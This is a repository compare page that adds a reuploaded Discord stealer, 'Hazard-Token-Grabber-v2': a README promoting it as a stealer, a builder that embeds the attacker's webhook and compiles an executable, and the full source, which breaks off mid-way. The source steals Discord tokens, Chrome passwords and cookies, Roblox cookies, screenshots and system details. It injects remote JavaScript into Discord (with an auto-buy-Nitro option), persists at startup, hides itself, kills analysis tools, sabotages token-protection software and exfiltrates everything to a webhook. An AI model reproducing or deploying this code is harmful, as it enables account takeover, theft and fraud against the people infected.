cyberrapists/python_discord_scene_2022_reuploads
SHA256
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: cyberrapists:6ddeec8ac70a676ba5769518a924df69af09b492384abe9a6fdd136fc603182a
Branches Tags
cyberrapists:master
...
compare: cyberrapists:feea90b9f6cc4e2dcf52c8e7c69e2ed8e7725fdb7f6dbfbe2c8e524b6f475530
Branches Tags
cyberrapists:master

2 Commits
6ddeec8ac7 ... feea90b9f6

Author SHA256 Message Date
unknown
feea90b9f6 Merge branch 'master' of https://git.fingeri.ng/your-slut/python_discord_scene_2022_reuploads 2026-06-06 01:22:24 +02:00
unknown
f07fa412f0 Initial commit 2026-06-06 01:22:00 +02:00
132 changed files with 22246 additions and 0 deletions
Expand all files Collapse all files

129
Hazard-Token-Grabber-v2-Reupload/.gitignore vendored Normal file
View File

@@ -0,0 +1,129 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
.python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/

21
Hazard-Token-Grabber-v2-Reupload/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2022 Schwungvoller
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

97
Hazard-Token-Grabber-v2-Reupload/README.md Normal file
View File

@@ -0,0 +1,97 @@
<div align="center">
<h1><a href="https://github.com/DamagingRose/Rose-Injector">PROJECT DISCONTINUED!!! <br>BETTER & UPDATED STEALER HERE</a>!</h1>
</div>
### <div align="center"> ☣ Hazard-Token-Grabber-v2 ☣
<div align="center">
<img src="https://img.shields.io/github/languages/top/zappelig/Hazard-Token-Grabber-v2?color=%23000000">
<img src="https://img.shields.io/github/stars/zappelig/Hazard-Token-Grabber-v2?color=%23000000&logoColor=%23000000">
<br>
<img src="https://img.shields.io/github/commit-activity/w/zappelig/Hazard-Token-Grabber-v2?color=%23000000">
<img src="https://img.shields.io/github/last-commit/zappelig/Hazard-Token-Grabber-v2?color=%23000000&logoColor=%23000000">
<br>
<img src="https://img.shields.io/github/issues/zappelig/Hazard-Token-Grabber-v2?color=%23000000&logoColor=%23000000">
<img src="https://img.shields.io/github/issues-closed/zappelig/Hazard-Token-Grabber-v2?color=%23000000&logoColor=%23000000">
### THIS PROJECT WAS CREATED FOR EDUCATIONAL PURPOSES!!! IT IS NONE OF MY BUSINESS WHAT YOU DO WITH IT, I CANNOT BE LIABLE AND BY USING THIS PROGRAM YOU AGREE TO THIS!!
➼ ⚠ Credits to Rdimo ⚠
</div>
<hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">
![hazard-grabber](https://user-images.githubusercontent.com/96620548/199788080-2eaf09e2-de07-423e-86b9-7980c7165c01.png)
---------------------------------------------------------------------------------------------------
<hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">
Hello! I'm pretty new on Github! Some days ago I found my old Hazard-Grabber directory and a repost with some changes from someone else. Enjoy this small repost with a hopefully easy tutorial.
As I said - I'm new 👋, but I will try my best ♡
And yes, if you wanna call me that, you can call me a skid. That is the only thing I can do at the moment, but I'm trying to create my own projects.
I'm learning coding at the moment to create my own projects as I mentioned before, but I'm pretty young and broke, so please don't hate me for copying/posting this stuff :)
### You would make me really happy if you ⭐ this repository if you like it!
---------------------------------------------------------------------------------------------------
<div align="center">
### 💉 **Installation and use**
</div>
It is really easy to set this up! Just get [python version 3.10](https://www.python.org/ftp/python/3.10.9/python-3.10.9-amd64.exe).
Click the blue/green "CODE" button on this page. Choose the option "DOWNLOAD ZIP". Or you can directly download the ZIP from [this link](https://github.com/Gumbobrot/Hazard-Token-Grabber-v2/archive/refs/heads/main.zip).
Extract to ZIP to your Desktop and enter the Hazard-Token-Grabber-v2 folder. In there, just run start.bat and follow the instructions that it gives to you.
---------------------------------------------------------------------------------------------------
<div align="center">
### 📷 **Screenshots**
</div>
![hazard-v2](https://user-images.githubusercontent.com/96620548/200128638-acb433e6-551e-4f7a-861c-09cfd570fa7b.png)
<hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">
<div align="center">
### 🎈 **Hazard-Grabber is a popular Stealer with many features**
</div>
- Manipulating code and more
> (If you don't like a feature, you can easily turn it off and change the code to whatever you want.)
- Hide it-self
> (This feature, hides logs and more, so the infected person doesn't really know that he or she just got logged.)
- Start-Up injection
> (If the infected User starts his PC, this feature will re-run the Trojan so you can get all his or her Passwords, Cookies and more again.)
- Password-Logger
> (Logs all Google Chrome Passwords.This feature also supports some other browsers like Opera GX, Brave and others.)
- Cookie-Logger
> (Logs all Google Chrome Cookies. This feature also supports some other browsers like Opera GX, Brave and others.)
- Discord Injection
> (Auto-Update. If the infected User changes his password, email or phone it will be displayed through the webhook to you.)
------------------------------------------------------------------------------------------------------------
### 📝 **If you have any other improvement ideas or questions, just ask me on Discord or join our server!**
- [Contact me here!](https://discordlookup.com/user/1075072806892621874)
- [Our Discord here!](https://discord.gg/74ddhQJcM9)
------------------------------------------------------------------------------------------------------------
*Thanks to everyone who took the time to read through this slightly longer tutorial! ↑↑*

5
Hazard-Token-Grabber-v2-Reupload/start.bat Normal file
View File

@@ -0,0 +1,5 @@
cd tools
cd requirements
python -m pip install -r requirements.txt
cd ..
python builder.py

115
Hazard-Token-Grabber-v2-Reupload/tools/builder.py Normal file
View File

@@ -0,0 +1,115 @@
import time
import os
import sys
import shutil
from win10toast import ToastNotifier
os.system('title Hazard-Grabber Builder')
os.system("color b")
os.system("cls")
def main():
webhook = input("[Enter your webhook URL]:> ")
global search_text
global replace_text
search_text = "WEBHOOK_URL"
replace_text = webhook
try:
with open(r'src/hazard.py', 'r') as file:
data = file.read()
data = data.replace(search_text, replace_text)
with open(r'src/hazard.py', 'w') as file:
file.write(data)
print("[!] Successfully wrote your webhook to the src. Make sure again you entered a correct one!")
time.sleep(0.5)
print(f"[*] This is the webhook you entered: {webhook}")
except Exception:
print("[?] Failed to write your webhook to the src. Make sure the code is correct and has not been changed.")
time.sleep(0.5)
print(f"[*] This is the webhook you entered: {webhook}")
global file_name
file_name = input("[Enter the name of the executable (File name)]:> ")
time.sleep(1.5)
print("[*] Starting to build your stub in 3 seconds...")
time.sleep(3.0)
print("[!] File compilation started well.")
time.sleep(0.5)
print("[*] Press CTRL + C to cancel, may break the application for future builds.")
time.sleep(1.0)
os.system(f"pyinstaller --noconsole --onefile -n {file_name} -i icons/exe.ico src/hazard.py")
os.system("cls")
global directory
global toast
directory = os.getcwd()
toast = ToastNotifier()
toast.show_toast(
"Hazard-Grabber-v2",
"Your stub has been built!",
duration = 25,
icon_path = directory+"/icons/hazard.ico",
threaded = True,
)
path = directory+"/build/"+file_name
path2 = directory+f"{file_name}.spec"
dist = "/dist"
try:
shutil.rmtree(f"{directory}/build")
os.remove(f"{file_name}.spec")
print(f"[*] Successfully cleaned the folder and removed non-required/temporary files. ({path}, {path2})")
except:
print(f"[!] Couldn't delete temporary files. They have probably already been deleted.")
time.sleep(1.0)
try:
with open(r'src/hazard.py', 'r') as file:
data = file.read()
data = data.replace(replace_text, search_text)
with open(r'src/hazard.py', 'w') as file:
file.write(data)
print("[*] Successfully removed your webhook from the src for future builds.")
time.sleep(0.5)
except:
print("[!] Failed to remove your webhook from the src. Make sure the code is correct and has not been changed.")
time.sleep(0.5)
try:
path = directory + "/dist"
path = os.path.realpath(path)
os.startfile(path)
print(f"[*] Opened the directory where {file_name}.exe is located.")
except:
print(f"[!] Couldn't open the directory where {file_name}.exe is located. Maybe is has been deleted or wasn't built correctly. I would still recommend you to check the following directory for {file_name}.exe: '{directory} + {dist}'")
time.sleep(1.0)
print(f"[*] Done. You can check the following directory, but the folder should have already been opened: [ {os.path.dirname(os.path.realpath(__file__))} ] for '{file_name}.exe'")
time.sleep(0.5)
print("[*] I would appreciate a star on GitHub and some feedback really much! https://github.com/gumbobr0t")
time.sleep(0.5)
print("[*] You may also like to contribute in our community. https://discord.gg/59EbJfEFpk")
time.sleep(0.5)
print("[!] Closing in 10 seconds...")
time.sleep(10)
sys.exit()
if __name__ == "__main__":
main()

BIN
Hazard-Token-Grabber-v2-Reupload/tools/icons/exe.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 117 KiB

BIN
Hazard-Token-Grabber-v2-Reupload/tools/icons/hazard.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 263 KiB

BIN
Hazard-Token-Grabber-v2-Reupload/tools/pictures/hazard.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 236 KiB

11
Hazard-Token-Grabber-v2-Reupload/tools/requirements/requirements.txt Normal file
View File

@@ -0,0 +1,11 @@
httpx
pyotp
psutil
pypiwin32
pycryptodome
pyinstaller>=5.0
PIL-tools
aes
colorama
win10toast
requests

727
Hazard-Token-Grabber-v2-Reupload/tools/src/hazard.py Normal file
View File

@@ -0,0 +1,727 @@
# Tries to import modules, if any are missing it will prompt to install them below.
try:
import os
import json
import httpx
import winreg
import ctypes
import shutil
import psutil
import asyncio
import time
import sys
import sqlite3
import zipfile
import threading
import subprocess
import requests
import re
from sys import argv
from PIL import ImageGrab
from base64 import b64decode
from tempfile import mkdtemp
from re import findall, match
from Crypto.Cipher import AES
from colorama import Fore, Style
from win32crypt import CryptUnprotectData
except:
import time
import os
input("Found missing modules. Press enter to install them.")
print("Installing missing modules in 3 seconds. CTRL + C to cancel.")
time.sleep(3.0)
os.system("pip install requests && pip install httpx && pip install pyotp && pip install psutil && pip install pypiwin32 && pip install aes && pip install pycryptodome && pip install pyinstaller>=5.0 && pip install PIL-tools && pip install colorama && pip install win10toast")
os.system("cls")
print("Installed the missing modules successfully. Please restart the client. Closing this terminal in 10 seconds.")
time.sleep(10)
sys.exit
config = {
# Replace WEBHOOK_URL with your own webhook. The collected data will be sent to this webhook.
'webhook': "WEBHOOK_URL",
# Set to False if you don't want it to kill programs such as discord upon running the exe.
'kill_processes': True,
# This makes the program run the file after every startup.
'startup': True,
# This feature will make the file hide itself after opened.
'hide_self': True,
# The program does it's best to prevent the program from being debugged and drastically reduces the changes of your webhook being found.
'anti_debug': True,
# If successfully injected to Discord, the program will try to automatically buy Discord Nitro with Credit Cards/PayPal/Other Payments and send it to your webhook.
'auto_buy_nitro': True,
# This list of programs will be killed if Hazard-Grabber detects that any of these are running, you can add more or remove programs if you want.
'blackListedPrograms':
[
"httpdebuggerui",
"wireshark",
"fiddler",
"regedit",
"cmd",
"taskmgr",
"vboxservice",
"df5serv",
"processhacker",
"vboxtray",
"vmtoolsd",
"vmwaretray",
"ida64",
"ollydbg",
"pestudio",
"vmwareuser",
"vgauthservice",
"vmacthlp",
"x96dbg",
"vmsrvc",
"x32dbg",
"vmusrvc",
"prl_cc",
"prl_tools",
"xenservice",
"qemu-ga",
"joeboxcontrol",
"ksdumperclient",
"ksdumper",
"joeboxserver"
]
}
Victim = os.getlogin()
Victim_pc = os.getenv("COMPUTERNAME")
class functions(object):
@staticmethod
def getHeaders(token: str = None):
headers = {
"Content-Type": "application/json",
}
if token:
headers.update({"Authorization": token})
return headers
@staticmethod
def get_master_key(path) -> str:
with open(path, "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
@staticmethod
def decrypt_val(buff, master_key) -> str:
try:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
except Exception:
return "Failed to decrypt password"
@staticmethod
def fetchConf(e: str) -> str or bool | None:
return config.get(e)
class Injection(functions):
def __init__(self, webhook: str) -> None:
self.appdata = os.getenv('LOCALAPPDATA')
self.discord_dirs = [
self.appdata + '\\Discord',
self.appdata + '\\DiscordCanary',
self.appdata + '\\DiscordPTB',
self.appdata + '\\DiscordDevelopment'
]
if self.fetchConf('auto_buy_nitro'):
self.code = requests.get('https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/injection/auto_buy__TRUE__injection.js').text
else:
self.code = requests.get('https://raw.githubusercontent.com/DamagingRose/Rose-Injector/main/injection/auto_buy__FALSE__injection.js').text
for proc in psutil.process_iter():
if 'discord' in proc.name().lower():
proc.kill()
for dir in self.discord_dirs:
if not os.path.exists(dir):
continue
if self.get_core(dir) is not None:
with open(self.get_core(dir)[0] + '\\index.js', 'w', encoding='utf-8') as f:
f.write((self.code).replace('discord_desktop_core-1', self.get_core(dir)[1]).replace('%WEBHOOK%', webhook))
self.start_discord(dir)
@staticmethod
def get_core(dir: str) -> tuple:
for file in os.listdir(dir):
if re.search(r'app-+?', file):
modules = dir + '\\' + file + '\\modules'
if not os.path.exists(modules):
continue
for file in os.listdir(modules):
if re.search(r'discord_desktop_core-+?', file):
core = modules + '\\' + file + '\\' + 'discord_desktop_core'
if not os.path.exists(core + '\\index.js'):
continue
return core, file
@staticmethod
def start_discord(dir: str) -> None:
update = dir + '\\Update.exe'
executable = dir.split('\\')[-1] + '.exe'
for file in os.listdir(dir):
if re.search(r'app-+?', file):
app = dir + '\\' + file
if os.path.exists(app + '\\' + 'modules'):
for file in os.listdir(app):
if file == executable:
executable = app + '\\' + executable
subprocess.call([update, '--processStart', executable],
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Injection(functions)
class Hazard_Token_Grabber_V2(functions):
def __init__(self):
self.webhook = self.fetchConf('webhook')
self.baseurl = "https://discord.com/api/v9/users/@me"
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.dir = mkdtemp()
self.startup_loc = self.roaming + \
"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"
self.sep = os.sep
self.tokens = []
self.robloxcookies = []
os.makedirs(self.dir, exist_ok=True)
def try_extract(func):
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception:
pass
return wrapper
async def checkToken(self, tkn: str) -> str:
try:
r = httpx.get(
url=self.baseurl,
headers=self.getHeaders(tkn),
timeout=5.0
)
except (httpx._exceptions.ConnectTimeout, httpx._exceptions.TimeoutException):
pass
if r.status_code == 200 and tkn not in self.tokens:
self.tokens.append(tkn)
async def init(self):
if self.fetchConf('anti_debug'):
if AntiDebug().inVM:
os._exit(0)
await self.bypassBetterDiscord()
await self.bypassTokenProtector()
function_list = [self.screenshot, self.grabTokens,
self.grabRobloxCookie]
if self.fetchConf('hide_self'):
function_list.append(self.hide)
if self.fetchConf('kill_processes'):
await self.killProcesses()
if self.fetchConf('startup'):
function_list.append(self.startup)
if os.path.exists(self.appdata+'\\Google\\Chrome\\User Data\\Default') and os.path.exists(self.appdata+'\\Google\\Chrome\\User Data\\Local State'):
function_list.append(self.grabPassword)
function_list.append(self.grabCookies)
for func in function_list:
process = threading.Thread(target=func, daemon=True)
process.start()
for t in threading.enumerate():
try:
t.join()
except RuntimeError:
continue
self.neatifyTokens()
self.finish()
shutil.rmtree(self.dir)
def hide(self):
ctypes.windll.kernel32.SetFileAttributesW(argv[0], 2)
def startup(self):
try:
shutil.copy2(argv[0], self.startup_loc)
except Exception:
pass
async def killProcesses(self):
blackListedPrograms = self.fetchConf('blackListedPrograms')
for i in ['discord', 'discordtokenprotector', 'discordcanary', 'discorddevelopment', 'discordptb']:
blackListedPrograms.append(i)
for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in blackListedPrograms):
try:
proc.kill()
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass
async def bypassTokenProtector(self):
# Easily destroys and fucks up the token-protector by https://github.com/andro2157/DiscordTokenProtector
tp = f"{self.roaming}\\DiscordTokenProtector\\"
if not os.path.exists(tp):
return
config = tp+"config.json"
for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]:
try:
os.remove(tp+i)
except FileNotFoundError:
pass
if os.path.exists(config):
with open(config, errors="ignore") as f:
try:
item = json.load(f)
except json.decoder.JSONDecodeError:
return
item['S1LKT0UCH just raped your token-protector shit LMAOOOO https://discord.gg/HfwtKBEFAJ'] = "https://github.com/S1LKT0UCH"
item['auto_start'] = False
item['auto_start_discord'] = False
item['integrity'] = False
item['integrity_allowbetterdiscord'] = False
item['integrity_checkexecutable'] = False
item['integrity_checkhash'] = False
item['integrity_checkmodule'] = False
item['integrity_checkscripts'] = False
item['integrity_checkresource'] = False
item['integrity_redownloadhashes'] = False
item['iterations_iv'] = 364
item['iterations_key'] = 457
item['version'] = 69420
with open(config, 'w') as f:
json.dump(item, f, indent=2, sort_keys=True)
with open(config, 'a') as f:
f.write(
"\n\n//S1LKT0UCH just raped your token-protector shit LMAOOOO https://discord.gg/HfwtKBEFAJ | https://github.com/S1LKT0UCH")
async def bypassBetterDiscord(self):
bd = self.roaming+"\\BetterDiscord\\data\\betterdiscord.asar"
if os.path.exists(bd):
x = "api/webhooks"
with open(bd, 'r', encoding="cp437", errors='ignore') as f:
txt = f.read()
content = txt.replace(x, 'Rdmo1TheGoat')
with open(bd, 'w', newline='', encoding="cp437", errors='ignore') as f:
f.write(content)
def getProductValues(self):
try:
wkey = subprocess.check_output(
r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault", creationflags=0x08000000).decode().rstrip()
except Exception:
wkey = "N/A (Likely Pirated)"
try:
productName = subprocess.check_output(
r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", creationflags=0x08000000).decode().rstrip()
except Exception:
productName = "N/A"
return [productName, wkey]
@try_extract
def grabTokens(self):
paths = {
'Discord': self.roaming + r'\\discord\\Local Storage\\leveldb\\',
'Discord Canary': self.roaming + r'\\discordcanary\\Local Storage\\leveldb\\',
'Lightcord': self.roaming + r'\\Lightcord\\Local Storage\\leveldb\\',
'Discord PTB': self.roaming + r'\\discordptb\\Local Storage\\leveldb\\',
'Opera': self.roaming + r'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
'Opera GX': self.roaming + r'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
'Amigo': self.appdata + r'\\Amigo\\User Data\\Local Storage\\leveldb\\',
'Torch': self.appdata + r'\\Torch\\User Data\\Local Storage\\leveldb\\',
'Kometa': self.appdata + r'\\Kometa\\User Data\\Local Storage\\leveldb\\',
'Orbitum': self.appdata + r'\\Orbitum\\User Data\\Local Storage\\leveldb\\',
'CentBrowser': self.appdata + r'\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
'7Star': self.appdata + r'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
'Sputnik': self.appdata + r'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
'Vivaldi': self.appdata + r'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
'Chrome SxS': self.appdata + r'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
'Chrome': self.appdata + r'\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
'Epic Privacy Browser': self.appdata + r'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
'Microsoft Edge': self.appdata + r'\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
'Uran': self.appdata + r'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
'Yandex': self.appdata + r'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
'Brave': self.appdata + r'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
'Iridium': self.appdata + r'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
}
for name, path in paths.items():
if not os.path.exists(path):
continue
disc = name.replace(" ", "").lower()
if "cord" in path:
if os.path.exists(self.roaming+f'\\{disc}\\Local State'):
for file_name in os.listdir(path):
if file_name[-3:] not in ["log", "ldb"]:
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in findall(self.encrypted_regex, line):
token = self.decrypt_val(b64decode(
y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(self.roaming+f'\\{disc}\\Local State'))
asyncio.run(self.checkToken(token))
else:
for file_name in os.listdir(path):
if file_name[-3:] not in ["log", "ldb"]:
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for token in findall(self.regex, line):
asyncio.run(self.checkToken(token))
if os.path.exists(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for path, _, files in os.walk(self.roaming+"\\Mozilla\\Firefox\\Profiles"):
for _file in files:
if not _file.endswith('.sqlite'):
continue
for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]:
for token in findall(self.regex, line):
asyncio.run(self.checkToken(token))
@try_extract
def grabPassword(self):
master_key = self.get_master_key(
self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
login = self.dir+self.sep+"Loginvault1.db"
shutil.copy2(login_db, login)
conn = sqlite3.connect(login)
cursor = conn.cursor()
with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
cursor.execute(
"SELECT action_url, username_value, password_value FROM logins")
for r in cursor.fetchall():
url = r[0]
username = r[1]
encrypted_password = r[2]
decrypted_password = self.decrypt_val(
encrypted_password, master_key)
if url != "":
f.write(
f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
cursor.close()
conn.close()
os.remove(login)
@try_extract
def grabCookies(self):
master_key = self.get_master_key(
self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Network\\cookies'
login = self.dir+self.sep+"Loginvault2.db"
shutil.copy2(login_db, login)
conn = sqlite3.connect(login)
cursor = conn.cursor()
with open(self.dir+"\\Google Cookies.txt", "w", encoding="cp437", errors='ignore') as f:
cursor.execute(
"SELECT host_key, name, encrypted_value from cookies")
for r in cursor.fetchall():
host = r[0]
user = r[1]
decrypted_cookie = self.decrypt_val(r[2], master_key)
if host != "":
f.write(
f"Host: {host}\nUser: {user}\nCookie: {decrypted_cookie}\n\n")
if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_' in decrypted_cookie:
self.robloxcookies.append(decrypted_cookie)
cursor.close()
conn.close()
os.remove(login)
def neatifyTokens(self):
f = open(self.dir+"\\Discord Info.txt",
"w", encoding="cp437", errors='ignore')
for token in self.tokens:
j = httpx.get(
self.baseurl, headers=self.getHeaders(token)).json()
user = j.get('username') + '#' + str(j.get("discriminator"))
badges = ""
flags = j['flags']
flags = j['flags']
if (flags == 1):
badges += "Staff, "
if (flags == 2):
badges += "Partner, "
if (flags == 4):
badges += "Hypesquad Event, "
if (flags == 8):
badges += "Green Bughunter, "
if (flags == 64):
badges += "Hypesquad Bravery, "
if (flags == 128):
badges += "HypeSquad Brillance, "
if (flags == 256):
badges += "HypeSquad Balance, "
if (flags == 512):
badges += "Early Supporter, "
if (flags == 16384):
badges += "Gold BugHunter, "
if (flags == 131072):
badges += "Verified Bot Developer, "
if (badges == ""):
badges = "None"
email = j.get("email")
phone = j.get("phone") if j.get(
"phone") else "No Phone Number attached"
nitro_data = httpx.get(
self.baseurl+'/billing/subscriptions', headers=self.getHeaders(token)).json()
has_nitro = False
has_nitro = bool(len(nitro_data) > 0)
billing = bool(len(json.loads(httpx.get(
self.baseurl+"/billing/payment-sources", headers=self.getHeaders(token)).text)) > 0)
f.write(f"{' '*17}{user}\n{'-'*50}\nToken: {token}\nHas Billing: {billing}\nNitro: {has_nitro}\nBadges: {badges}\nEmail: {email}\nPhone: {phone}\n\n")
f.close()
def grabRobloxCookie(self):
def subproc(path):
try:
return subprocess.check_output(
fr"powershell Get-ItemPropertyValue -Path {path}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
creationflags=0x08000000).decode().rstrip()
except Exception:
return None
reg_cookie = subproc(r'HKLM')
if not reg_cookie:
reg_cookie = subproc(r'HKCU')
if reg_cookie:
self.robloxcookies.append(reg_cookie)
if self.robloxcookies:
with open(self.dir+"\\Roblox Cookies.txt", "w") as f:
for i in self.robloxcookies:
f.write(i+'\n')
def screenshot(self):
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=True,
xdisplay=None
)
image.save(self.dir + "\\Screenshot.png")
image.close()
def finish(self):
for i in os.listdir(self.dir):
if i.endswith('.txt'):
path = self.dir+self.sep+i
with open(path, "r", errors="ignore") as ff:
x = ff.read()
if not x:
ff.close()
os.remove(path)
else:
with open(path, "w", encoding="utf-8", errors="ignore") as f:
f.write(
"🌟・Grabber By Rdimo・https://github.com/S1LKT0UCH/Hazard-Token-Grabber-v2\n\n")
with open(path, "a", encoding="utf-8", errors="ignore") as fp:
fp.write(
x+"\n\n🌟・Grabber By Rdimo・https://github.com/S1LKT0UCH/Hazard-Token-Grabber-v2")
w = self.getProductValues()
wname = w[0].replace(" ", "")
wkey = w[1].replace(" ", "")
ram = str(psutil.virtual_memory()[0]/1024 ** 3).split(".")[0]
disk = str(psutil.disk_usage('/')[0]/1024 ** 3).split(".")[0]
# IP, country, city, region, google maps location
data = httpx.get("https://ipinfo.io/json").json()
ip = data.get('ip')
city = data.get('city')
country = data.get('country')
region = data.get('region')
org = data.get('org')
googlemap = "https://www.google.com/maps/search/google+map++" + \
data.get('loc')
_zipfile = os.path.join(
self.appdata, f'Hazard-v2-[{Victim}].zip')
zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(self.dir)
for dirname, _, files in os.walk(self.dir):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
zipped_file.write(absname, arcname)
zipped_file.close()
files_found = ''
for f in os.listdir(self.dir):
files_found += f"{f}\n"
tokens = ''
for tkn in self.tokens:
tokens += f'{tkn}\n\n'
fileCount = f"{len(files)} Files Found: "
embed = {
'username'
'avatar_url': 'https://cdn.discordapp.com/attachments/1018946825585168446/1031609195256090624/e1jWmMP.webp',
'embeds': [
{
'author': {
'name': f'{Victim} Just ran Hazard Token Grabber-v2',
'url': 'https://github.com/S1LKT0UCH/Hazard-Token-Grabber-v2',
'icon_url': 'https://cdn.discordapp.com/attachments/1018946825585168446/1031610712377802783/200w.gif'
},
'color': 16119101,
'description': f'[Google Maps Location]({googlemap})',
'fields': [
{
'name': '\u200b',
'value': f'''```fix
IP:{ip.replace(" ", "") if ip else "N/A"}
Org:{org.replace(" ", "") if org else "N/A"}
City:{city.replace(" ", "") if city else "N/A"}
Region:{region.replace(" ", "") if region else "N/A"}
Country:{country.replace(" ", "") if country else "N/A"}```
'''.replace(' ', ''),
'inline': True
},
{
'name': '\u200b',
'value': f'''```fix
